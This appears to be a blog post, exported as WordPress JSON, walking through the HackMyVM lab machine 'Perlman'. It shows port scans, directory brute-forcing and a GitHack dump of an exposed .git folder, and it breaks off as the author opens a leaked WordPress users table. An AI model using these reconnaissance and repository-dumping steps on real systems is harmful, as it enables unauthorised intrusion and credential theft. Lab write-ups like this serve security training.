{"id":754,"date":"2024-07-11T17:48:03","date_gmt":"2024-07-11T09:48:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=754"},"modified":"2024-07-11T17:48:03","modified_gmt":"2024-07-11T09:48:03","slug":"hmv-_-perlman","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/754\/07\/11\/2024\/","title":{"rendered":"hmv[-_-]Perlman"},"content":{"rendered":"<h1>Perlman<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746957.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746957.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710134639726\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746959.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746959.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711094431031\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.176:22\nOpen 192.168.0.176:25\nOpen 192.168.0.176:110\nOpen 192.168.0.176:119\nOpen 192.168.0.176:80\nOpen 192.168.0.176:995\n\nPORT    STATE SERVICE  REASON  VERSION\n22\/tcp  open  ssh      syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 f0:f4:7d:ad:5d:2a:25:ec:17:b5:62:b0:2e:a5:8d:4f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2DYUfsVcKnbknL8l\/3obgwbwPStIpVR69RgIvubPxz0GPaYH5n9yPnria4TVmKwzkUMCmxNlfG9\/a6Fgzdom07H7eIhUAIXHOWjmq+bowp14aMEopOtizr3M7DpU5Ye46KeSy97Yu+x0bjn+6wcI+LPZudp8GSdel4324PZ4kLH5NXM4LIQygvJjQ5CIArZv2YiEDeTtDSIde90SZoIN+XcJ0+J+jzqIAJZmeT7Gqf62fj5ti\/koi9sQzTjvCpDdWjAtiKEOkP1vonyM5MlGIL\/V0+f78crS2JmSfeiKN3hTr7wRSwPBZvoDbVCiz92IgAHzxjpy5uzBTp6gY5V4wBIZhP5JGBnn3rJsvPH5T8Vr6pe4IfJ+z398b+ogyobbrJNv3aiD2u4RegviVE6r8mSBPLbKA1mIgy5qA8SHpJibKJp6+gdG0k0QcH4kBMdDNggIsuN8FxcX2CeT\/qoGOeg+KXvUrA2LDFyuVcWN9t2T6z1eA+QsPjpodmNGbOpU=\n|   256 f1:d8:01:07:9f:d7:8d:2e:da:a4:9f:36:a2:ff:2a:df (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPJwZhipbadeNNxszKG3A83dRK+orUlQ0hAZtAHH5XFrJYUYW3KTAsXHfb54rCCXQApecmcQGj\/wsWX5Udced9k=\n|   256 91:02:29:33:c5:ff:2d:d8:63:b8:47:f3:f3:d8:79:ac (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBssx4VcQhzif7T2mibWNJYqgXRDUbndkYiBGfm3XCt4\n25\/tcp  open  smtp     syn-ack Postfix smtpd\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after:  2032-06-29T10:12:39\n| MD5:   1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| 
MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: perlman.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp  open  http     syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: Sync - Mobile App Landing Page HTML Template\n| http-git: \n|   192.168.0.176:80\/.git\/\n|     Git repository found!\n|     Repository description: Unnamed repository; edit this file &#039;description&#039; to name the...\n|_    Last commit message: wp \n|_http-favicon: Unknown favicon MD5: 1BD511222AD00F8970D00AFDCF215F9B\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.54 (Debian)\n110\/tcp open  pop3     syn-ack Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) USER PIPELINING STLS RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after:  
2032-06-29T10:12:39\n| MD5:   1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n119\/tcp open  nntp     syn-ack InterNetNews (INN) 2.6.4\n995\/tcp open  ssl\/pop3 syn-ack Dovecot pop3d\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after:  2032-06-29T10:12:39\n| MD5:   1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| 
MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_pop3-capabilities: USER SASL(PLAIN) UIDL RESP-CODES TOP PIPELINING CAPA AUTH-RESP-CODE\nService Info: Hosts:  perlman.hmv, server.example.net; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86<code>.git<\/code>\u63a5\u7740\u770b\uff1a<\/p>\n<h3>\u76ee\u5f55\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html -q\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 47426]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.176\/images\/]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.176\/css\/]\n\/privacy-policy.html  (Status: 200) [Size: 25624]\n\/js                   (Status: 301) [Size: 311] [--&gt; 
http:\/\/192.168.0.176\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]<\/code><\/pre>\n<p>\u9ed8\u8ba4\u7684\u90a3\u4e2a<code>\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code>\u5b57\u5178\u626b\u4e0d\u51fa\u6765git\uff0c\u5c1d\u8bd5\u6362\u4e2a\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ sudo dirsearch -u http:\/\/$IP\/ -e* -i 200,300-399 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/perlman\/reports\/http_192.168.0.176\/__24-07-10_21-48-31.txt\n\nTarget: http:\/\/192.168.0.176\/\n\n[21:48:31] Starting: \n[21:48:32] 301 -  311B  - \/js  -&gt;  http:\/\/192.168.0.176\/js\/\n[21:48:40] 200 -   73B  - \/.git\/description\n[21:48:40] 200 -    0B  - \/.git\/\n[21:48:40] 200 -   23B  - \/.git\/HEAD\n[21:48:40] 301 -  313B  - \/.git  -&gt;  http:\/\/192.168.0.176\/.git\/\n[21:48:40] 200 -  412B  - \/.git\/branches\/\n[21:48:40] 200 -   92B  - \/.git\/config\n[21:48:40] 200 -  673B  - \/.git\/hooks\/\n[21:48:41] 200 -  409B  - \/.git\/logs\/HEAD\n[21:48:41] 200 -  483B  - \/.git\/logs\/\n[21:48:40] 200 -    3B  - \/.git\/COMMIT_EDITMSG\n[21:48:41] 200 -  459B  - \/.git\/info\/\n[21:48:41] 200 -  240B  - \/.git\/info\/exclude\n[21:48:41] 301 -  323B  - \/.git\/logs\/refs  -&gt;  http:\/\/192.168.0.176\/.git\/logs\/refs\/\n[21:48:41] 200 -  409B  - \/.git\/logs\/refs\/heads\/master\n[21:48:41] 200 -  463B  - \/.git\/refs\/\n[21:48:41] 301 -  329B  - \/.git\/logs\/refs\/heads  -&gt;  http:\/\/192.168.0.176\/.git\/logs\/refs\/heads\/\n[21:48:41] 301 -  323B  - \/.git\/refs\/tags  -&gt;  
http:\/\/192.168.0.176\/.git\/refs\/tags\/\n[21:48:41] 301 -  324B  - \/.git\/refs\/heads  -&gt;  http:\/\/192.168.0.176\/.git\/refs\/heads\/\n[21:48:41] 200 -    2KB - \/.git\/index\n[21:48:41] 200 -   41B  - \/.git\/refs\/heads\/master\n[21:48:41] 200 -  690B  - \/.git\/objects\/\n[21:51:12] 301 -  312B  - \/css  -&gt;  http:\/\/192.168.0.176\/css\/\n[21:52:09] 200 -  898B  - \/images\/\n[21:52:10] 301 -  315B  - \/images  -&gt;  http:\/\/192.168.0.176\/images\/\n[21:52:24] 200 -  578B  - \/js\/\n\nTask Completed<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746960.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746960.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711095116673\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746961.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746961.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711095147059\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h3>git\u6cc4\u9732<\/h3>\n<p>\u4e00\u773c\u770b\u5230git\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6cc4\u9732\u4e86\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python2 \/home\/kali\/GitHack\/GitHack.py http:\/\/$IP\/.git\/ \n\n  ____ _ _   _   _            _\n \/ ___(_) |_| | | | __ _  ___| | __\n| |  _| | __| |_| |\/ _` |\/ __| |\/ \/\n| |_| | | |_|  _  | (_| | (__|   &lt;\n \\____|_|\\__|_| |_|\\__,_|\\___|_|\\_\\{0.0.5}\n A &#039;.git&#039; folder disclosure exploit.\n\n[*] Check Depends\n[+] Check depends end\n[*] Set Paths\n[*] Target Url: http:\/\/192.168.0.176\/.git\/\n[*] Initialize Target\n[*] Try to Clone straightly\n[*] Clone\nCloning into &#039;\/home\/kali\/GitHack\/dist\/192.168.0.176&#039;...\nfatal: repository &#039;http:\/\/192.168.0.176\/.git\/&#039; not found\n[-] Clone Error\n[*] Try to Clone with Directory Listing\n[*] http:\/\/192.168.0.176\/.git\/ is not support Directory Listing\n[-] [Skip][First Try] Target is not support Directory Listing\n[*] Try to clone with Cache\n[*] Initialize Git\n[!] Initialize Git Error: hint: Using &#039;master&#039; as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint:   git config --global init.defaultBranch &lt;name&gt;\nhint: \nhint: Names commonly chosen instead of &#039;master&#039; are &#039;main&#039;, &#039;trunk&#039; and\nhint: &#039;development&#039;. 
The just-created branch can be renamed via this command:\nhint: \nhint:   git branch -m &lt;name&gt;\n\n[*] Cache files\n[*] packed-refs\n[*] config\n[*] HEAD\n[*] COMMIT_EDITMSG\n[*] ORIG_HEAD\n[*] FETCH_HEAD\n[*] refs\/heads\/master\n[*] refs\/remote\/master\n[*] index\n[*] logs\/HEAD\n[*] logs\/refs\/heads\/master\n[*] Fetch Commit Objects\n[*] objects\/40\/f3ff4215a1102c35447533676797ec06f8ffd9\n[*] objects\/70\/8220d31a540e356d8fd63fa1cc3d066199109a\n[*] objects\/0c\/f1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\n[*] objects\/ad\/422b39a4cdc8b5541a34c73756fe9c7ea87341\n[*] objects\/fb\/435af2cb9880a1b016c9d268a772587f15b01f\n[*] objects\/03\/9117dcf7eb7728a1e743d8b88ae88ed9f5f1cf\n[*] objects\/46\/2a3534e258daf09a0d2d9f324674c913dcbe31\n[*] objects\/90\/fc1a09cda9208e4d85cb62f0017cd3ebaf54e8\n[*] objects\/d5\/16536b94baeafb5ee6396a9d8b915a2ca5d399\n[*] objects\/f6\/cec0bc7daea37ac9e9c488d16a982d5f5b2c6d\n[*] objects\/78\/d1e9f6d53308ac6604cea994700c6df88da6f4\n[*] objects\/8b\/0d7de5c057dce3ab17d99e7766008c783bc287\n[*] objects\/81\/ecb6e0365bb60b6324d7b90f17df3fe949ccab\n[*] objects\/ad\/3f4525e7ceaba5e7af542d1dfd0ef6abb6b0a0\n[*] objects\/15\/8c826eec8513cc3eb8f9b9cfece64b73ecb256\n[*] objects\/00\/933018b10d9015482170a1b4b11611407334ba\n[*] objects\/8a\/5646ddca34e046cc2f172d98ce29d00ea39b63\n[*] objects\/d0\/1f63dba38e3e1d317502ec1d3cc6dd2d32cc7b\n[*] objects\/14\/424894c70ea1e64d3caf3bf7d24146a5a7b62d\n[*] objects\/1b\/6cc566a580516af2ae08b0e18cc30b7257d85c\n[*] objects\/43\/89ca985f8f6a8381bdeed57b0f678862b9c358\n[*] objects\/03\/d2ecd9e468cf069c51600ecbe13cf48136abe5\n[*] objects\/7e\/4c0667750620966b07dd4f3548cf04a43d9ffc\n[*] objects\/14\/5d3f7b92190c61bc700e06cac301867c912ead\n[*] objects\/a7\/4a3ab9c8047c8b96522ccc9554f2d8d9d7c37b\n[*] objects\/7c\/c33f9ce2b2b70d6ee3e4ca77db0305ba5b58a7\n[*] objects\/02\/2e935047123ce265a42a7d58a9e4d4fb8d59c9\n[*] objects\/87\/057e525b9791571806e63244bcf7c710d56ac0\n[*] 
objects\/7f\/e7dd389a3e63bb67ed90853c58a97c5a89d66c\n[*] objects\/d2\/9e54424558256922c83396a320ff7fec2a81dc\n[*] objects\/df\/304da7158234a923bb717fc72be3c20e2864b3\n[*] objects\/11\/c0725279f8dedf58b47412ba9faa5f6282c46a\n[*] objects\/57\/2f66c0aa68b1bbca2e73f6fc47b6dcf63d8d72\n[*] Fetch Commit Objects End\n[*] logs\/refs\/remote\/master\n[*] logs\/refs\/stash\n[*] refs\/stash\n[*] Valid Repository\n[+] Valid Repository Success\n\n[+] Clone Success. Dist File : \/home\/kali\/GitHack\/dist\/192.168.0.176<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ ls -la\ntotal 1212\ndrwxr-xr-x 4 kali kali    4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali    4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali    2144 Jul 10 22:00 commentmeta.sql\n-rw-r--r-- 1 kali kali    3538 Jul 10 22:00 comments.sql\ndrwxr-xr-x 2 kali kali    4096 Jul 10 22:00 db\ndrwxr-xr-x 8 kali kali    4096 Jul 10 22:00 .git\n-rw-r--r-- 1 kali kali    2720 Jul 10 22:00 links.sql\n-rw-r--r-- 1 kali kali 1082657 Jul 10 22:00 options.sql\n-rw-r--r-- 1 kali kali    2502 Jul 10 22:00 postmeta.sql\n-rw-r--r-- 1 kali kali   13542 Jul 10 22:00 posts.sql\n-rw-r--r-- 1 kali kali    2713 Jul 10 22:00 tcp_addresses.sql\n-rw-r--r-- 1 kali kali   24292 Jul 10 22:00 tcp_countries.sql\n-rw-r--r-- 1 kali kali   11572 Jul 10 22:00 tcp_currencies.sql\n-rw-r--r-- 1 kali kali    2051 Jul 10 22:00 tcp_orders_costsmeta.sql\n-rw-r--r-- 1 kali kali    2121 Jul 10 22:00 tcp_orders_costs.sql\n-rw-r--r-- 1 kali kali    2067 Jul 10 22:00 tcp_orders_detailsmeta.sql\n-rw-r--r-- 1 kali kali    2633 Jul 10 22:00 tcp_orders_details.sql\n-rw-r--r-- 1 kali kali    2003 Jul 10 22:00 tcp_ordersmeta.sql\n-rw-r--r-- 1 kali kali    4133 Jul 10 22:00 tcp_orders.sql\n-rw-r--r-- 1 kali kali    2055 Jul 10 22:00 tcp_rel_entities.sql\n-rw-r--r-- 1 kali kali    1905 Jul 10 22:00 tcp_taxes.sql\n-rw-r--r-- 1 kali kali  
  2196 Jul 10 22:00 tcp_tax_rates.sql\n-rw-r--r-- 1 kali kali    2114 Jul 10 22:00 termmeta.sql\n-rw-r--r-- 1 kali kali    2162 Jul 10 22:00 term_relationships.sql\n-rw-r--r-- 1 kali kali    2247 Jul 10 22:00 terms.sql\n-rw-r--r-- 1 kali kali    2446 Jul 10 22:00 term_taxonomy.sql\n-rw-r--r-- 1 kali kali    3943 Jul 10 22:00 usermeta.sql\n-rw-r--r-- 1 kali kali    2763 Jul 10 22:00 users.sql\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cat users.sql \n-- MariaDB dump 10.19  Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost    Database: wordpressdb\n-- ------------------------------------------------------\n-- Server version       10.5.15-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE=&#039;+00:00&#039; *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 